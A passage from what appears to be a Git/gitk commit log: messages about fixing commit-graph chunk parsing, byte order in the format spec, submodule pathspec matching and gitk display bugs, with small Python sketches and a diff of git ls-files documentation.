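        self.slab_size = slab_size
        self.slabs: List[Optional[List[list]]] = []

    def at(self, index: int) -> list:
        """Return the entry for a commit index, allocating its slab if needed."""
        slab_nr, offset = divmod(index, self.slab_size)
        while len(self.slabs) <= slab_nr:
            self.slabs.append(None)
        if self.slabs[slab_nr] is None:
            self.slabs[slab_nr] = [[] for _ in range(self.slab_size)]
        return self.slabs[slab_nr][offset]

    def clear(self) -> None:
        """Drop the slab storage itself; entry-owned data is not visited."""
        self.slabs = []

    def deep_clear(self, free_fn: Callable[[list], None]) -> None:
        """Call free_fn on every entry of every allocated slab, then clear."""
        for slab in self.slabs:
            if slab is None:
                continue
            for entry in slab:
                free_fn(entry)  # must cope with entries that were never used
        self.clear()
```

The caller neither iterates over all commits nor needs to know how the slabs are laid out; it only supplies the per-entry release function.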
Signed-off-by: SZEDER Gábor <szeder.dev@gmail.com>
Signed-off-by: Derrick Stolee <dstolee@microsoft.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The commit-graph format specifies that "All 4-byte numbers are in
network order", but the commit-graph contains 8-byte integers as well
(file offsets in the Chunk Lookup table), and their byte order is
unspecified.
Clarify that all multi-byte integers are in network byte order.
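For example, a Chunk Lookup entry holds a 4-byte ID followed by an 8-byte offset, and the offset is stored most significant byte first. The Python sketch below shows that encoding; the helper names are hypothetical.

```python
import struct
from typing import Tuple


def encode_lookup_entry(chunk_id: bytes, offset: int) -> bytes:
    """Pack a 4-byte chunk ID and an 8-byte offset in network byte order."""
    return struct.pack(">4sQ", chunk_id, offset)  # ">" means big-endian


def decode_lookup_entry(entry: bytes) -> Tuple[bytes, int]:
    """Inverse of encode_lookup_entry()."""
    chunk_id, offset = struct.unpack(">4sQ", entry)
    return chunk_id, offset
```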
Signed-off-by: SZEDER Gábor <szeder.dev@gmail.com>
Signed-off-by: Derrick Stolee <dstolee@microsoft.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The commit-graph file format specifies that the chunks may be in any
order. However, if the OID Lookup chunk happens to be the last one in
the file, then any command attempting to access the commit-graph data
will fail with:
fatal: invalid commit position. commit-graph is likely corrupt
In this case the error is wrong: the commit-graph file does conform to
the specification, but the parsing of the Chunk Lookup table is a bit
buggy, and leaves the field holding the number of commits in the
commit-graph zero-initialized.
The number of commits in the commit-graph is determined while parsing
the Chunk Lookup table, by dividing the size of the OID Lookup chunk
by the hash size. However, the Chunk Lookup table doesn't actually
store the size of the chunks, but it stores their starting offset.
Consequently, the size of a chunk can only be calculated by
subtracting the starting offset of that chunk from the offset of the
subsequent chunk, or in case of the last chunk from the offset
recorded in the terminating label. This is currently implemented in a
somewhat complicated way: as we iterate over the entries of the Chunk
Lookup table, we check the ID of each chunk and store its starting
offset, then we check the ID of the last seen chunk and calculate its
size using its previously saved offset if necessary (at the moment
it's only necessary for the OID Lookup chunk). Alas, while parsing
the Chunk Lookup table we only iterate through the "real" chunks, but
never look at the terminating label, thus don't even check whether
it's necessary to calculate the size of the last chunk. Consequently,
if the OID Lookup chunk is the last one, then we don't calculate its
size and in turn don't run the piece of code determining the number of
commits in the commit graph, leaving the field holding that number
unchanged (i.e. zero-initialized), eventually triggering the sanity
check in load_oid_from_graph().
Fix this by iterating through all entries in the Chunk Lookup table,
including the terminating label.
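The following Python model reproduces the problem and the fix in miniature. It is a simplified illustration of the "last seen chunk" logic described above, not the C code; `count_commits` and its `include_terminator` switch are hypothetical.

```python
import struct

LOOKUP_ENTRY_SIZE = 12  # 4-byte chunk ID + 8-byte file offset


def count_commits(table: bytes, num_chunks: int, hash_len: int,
                  include_terminator: bool = True) -> int:
    """Derive the commit count from the size of the OID Lookup chunk.

    The size of a chunk only becomes known when the entry *after* it is
    read. With include_terminator=False the loop models the old behaviour,
    which never looked at the terminating label.
    """
    num_commits = 0  # stays zero if the OIDL size is never computed
    last_id, last_offset = None, 0
    entries = num_chunks + 1 if include_terminator else num_chunks
    for i in range(entries):
        chunk_id, offset = struct.unpack_from(
            ">4sQ", table, i * LOOKUP_ENTRY_SIZE)
        if last_id == b"OIDL":
            num_commits = (offset - last_offset) // hash_len
        last_id, last_offset = chunk_id, offset
    return num_commits
```

When OIDL is the last chunk, only the loop that also visits the terminating label ever sees an entry following it, so only that variant yields a non-zero count.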
Note that this is the minimal fix, suitable for the maintenance track.
A better fix would be to simplify how the chunk sizes are calculated,
but that is a more invasive change, less suitable for 'maint', so that
will be done in later patches.
This additional flexibility of scanning more chunks breaks a test for
"git commit-graph verify" so alter that test to mutate the commit-graph
to have an even lower chunk count.
Signed-off-by: SZEDER Gábor <szeder.dev@gmail.com>
Signed-off-by: Derrick Stolee <dstolee@microsoft.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Submodules should be handled the same as regular directories with
respect to the presence of a trailing slash, i.e. commands like:
git diff rev1 rev2 -- $path
git rev-list HEAD -- $path
should produce the same output whether $path is 'submod' or 'submod/'.
This has been fixed in commit 74b4f7f277 (tree-walk.c: ignore trailing
slash on submodule in tree_entry_interesting(), 2014-01-23).
Unfortunately, that commit had the unintended side effect of handling
'submod/anything' the same as 'submod' and 'submod/' as well, e.g.:
$ git log --oneline --name-only -- sha1collisiondetection/whatever
4125f78222 sha1dc: update from upstream
sha1collisiondetection
07a20f569b Makefile: fix unaligned loads in sha1dc with UBSan
sha1collisiondetection
23e37f8e9d sha1dc: update from upstream
sha1collisiondetection
86cfd61e6b sha1dc: optionally use sha1collisiondetection as a submodule
sha1collisiondetection
Fix this by rejecting submodules as partial pathnames when their
trailing slash is followed by anything.
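The intended matching rule can be sketched in Python like this. It is a deliberately simplified model of a single tree entry checked against a single literal pathspec, not the logic of tree_entry_interesting(); `entry_interesting` is a hypothetical helper.

```python
def entry_interesting(entry_path: str, is_submodule: bool, pathspec: str) -> bool:
    """Decide whether a tree entry is relevant for a literal pathspec."""
    # 'submod' and 'submod/' (or 'dir' and 'dir/') name the entry itself.
    if pathspec in (entry_path, entry_path + "/"):
        return True
    if pathspec.startswith(entry_path + "/"):
        # The pathspec names something below this entry. A directory can
        # be descended into, but a submodule has nothing to match inside.
        return not is_submodule
    return False
```

Under this rule 'submod/anything' no longer selects the submodule entry, while 'dir/anything' still leads into a regular directory.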
Signed-off-by: SZEDER Gábor <szeder.dev@gmail.com>
Signed-off-by: Derrick Stolee <dstolee@microsoft.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Currently, submodule diffs can cause the diff context menu to fail
to appear because of a couple of bugs in parseblobdiffline:
* it appends the submodule name to ctext_file_lines instead of
a line number, which breaks the binary search in find_ctext_fileinfo;
* it can desynchronize ctext_file_names and ctext_file_lines
by appending to the former but not the latter, which also breaks
find_ctext_fileinfo.
Fix both of these.
Note: a side effect of this patch is that the context menu also
starts appearing when you right-click on submodule diffs (and not just
regular diffs). The menu is non-functional in this case, though,
since you can't run blame on submodules.
Signed-off-by: Роман Донченко <dpb@corrigendum.ru>
Signed-off-by: Paul Mackerras <paulus@ozlabs.org>
The recently introduced background for the tags that highlight
added and removed text takes precedence over the background color
of the selection. But selected text is more important than the
highlighted text. Make the highlighting tags the lowest priority.
The same argument holds for the file separator and the highlight
of search results. Therefore, make them also low-priority. But
search results are a bit more important; therefore, keep them
above the other tags.
Signed-off-by: Johannes Sixt <j6t@kdbg.org>
Signed-off-by: Paul Mackerras <paulus@ozlabs.org>
Not using colored background for added and removed lines is a missed
opportunity to make diff lines easier to grasp visually.
Use a subtle red/green background by default. Make the font slightly darker
to improve contrast.
Signed-off-by: Stefan Dotterweich <stefandotterweich@gmx.de>
Signed-off-by: Paul Mackerras <paulus@ozlabs.org>
784b7e2f ("gitk: Fix "External diff" with separate work tree",
2011-04-04) added an unconditional call to "git rev-parse
--show-toplevel" to set up a global variable quite early in the
course of the program, so that the location of the working tree can
later be known if/when the user chooses to run the external diff via
the external_diff_get_one_file proc. Before that change, the
external diff code used to assume that the parent directory of ".git"
directory is the top-level of the working tree.
Recent versions of git, however, notice that "rev-parse --show-toplevel"
executed in a bare repository is an error, which makes gitk stop
even before the user could attempt to run external diff.
To work around this issue, use the gitworktree helper introduced in
65bb0bda ("gitk: Fix the display of files when filtered by path",
2011-12-13), which is prepared to see failures from "rev-parse
--show-toplevel" and from the other means it uses to find the top-level
of the working tree. The resulting value in the $worktree global,
when run in a bare repository, is bogus, but the code is not
prepared to run external diff correctly without a working tree
anyway ;-)
[paulus@ozlabs.org - folded in fix from Eric Sunshine]
Helped-by: Eric Sunshine <sunshine@sunshineco.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Signed-off-by: Paul Mackerras <paulus@ozlabs.org>
Bug was: gitk would overwrite the botwidth setting in .gitk with
a nonsense value when not using tk themes. Moving the affected
line within the conditional results in the expected behavior.
Signed-off-by: Eric Huber <echuber2@illinois.edu>
Signed-off-by: Paul Mackerras <paulus@ozlabs.org>
gitk applies submodule highlighting (coloring lines starting with
" >" and " <") when `currdiffsubmod` is not an empty string.
However, it fails to reset `currdiffsubmod` after a submodule diff
ends, so any file diffs following a submodule diff will still be
highlighted as if they were submodule diffs.
There are two problems with the way gitk tries to reset `currdiffsubmod`:
1. The code says `set $currdiffsubmod` instead of `set currdiffsubmod`,
so it actually sets the variable whose name is the submodule path
instead.
2. It tries to do it after the first line in a submodule diff, which
is incorrect, since submodule diffs can contain multiple lines.
Fix this by resetting `currdiffsubmod` when a file diff starts.
Signed-off-by: Роман Донченко <dpb@corrigendum.ru>
Signed-off-by: Paul Mackerras <paulus@ozlabs.org>
After "git checkout -b '漢字'" to create a branch with UTF-8
character in it, "gitk" shows the branch name incorrectly, as it
forgets to turn the bytes read from the "git show-ref" command
into Unicode characters.
Signed-off-by: Kazuhiro Kato <kato-k@ksysllc.co.jp>
Signed-off-by: Paul Mackerras <paulus@ozlabs.org>
Now that the commit reference format has a canonical name, let's use this
name in gitk's UI and implementation.
Signed-off-by: Beat Bolli <dev+git@drbeat.li>
[dl: based the patch on gitk's tree]
Signed-off-by: Denton Liu <liu.denton@gmail.com>
Signed-off-by: Paul Mackerras <paulus@ozlabs.org>
2019-12-15 15:21:59 +11:00
1413 changed files with 152209 additions and 79866 deletions
-This merges the file listing in the directory cache index with the
-actual working directory list, and shows different combinations of the
-two.
+This merges the file listing in the index with the actual working
+directory list, and shows different combinations of the two.
 One or more of the options below may be used to determine the files
 shown:
@@ -81,6 +81,13 @@ OPTIONS
 \0 line termination on output and do not quote filenames.
 See OUTPUT below for more information.
+--deduplicate::
+When only filenames are shown, suppress duplicates that may
+come from having multiple stages during a merge, or giving
+`--deleted` and `--modified` option at the same time.
+When any of the `-t`, `--unmerged`, or `--stage` option is
+in use, this option has no effect.
 -x <pattern>::
 --exclude=<pattern>::
 Skip untracked files matching pattern.
@@ -153,7 +160,8 @@ a space) at the start of each line:
 --abbrev[=<n>]::
 Instead of showing the full 40-byte hexadecimal object
-lines, show only a partial prefix.
+lines, show the shortest prefix that is at least '<n>'
+hexdigits long that uniquely refers the object.
 Non default number of digits can be specified with --abbrev=<n>.
 --debug::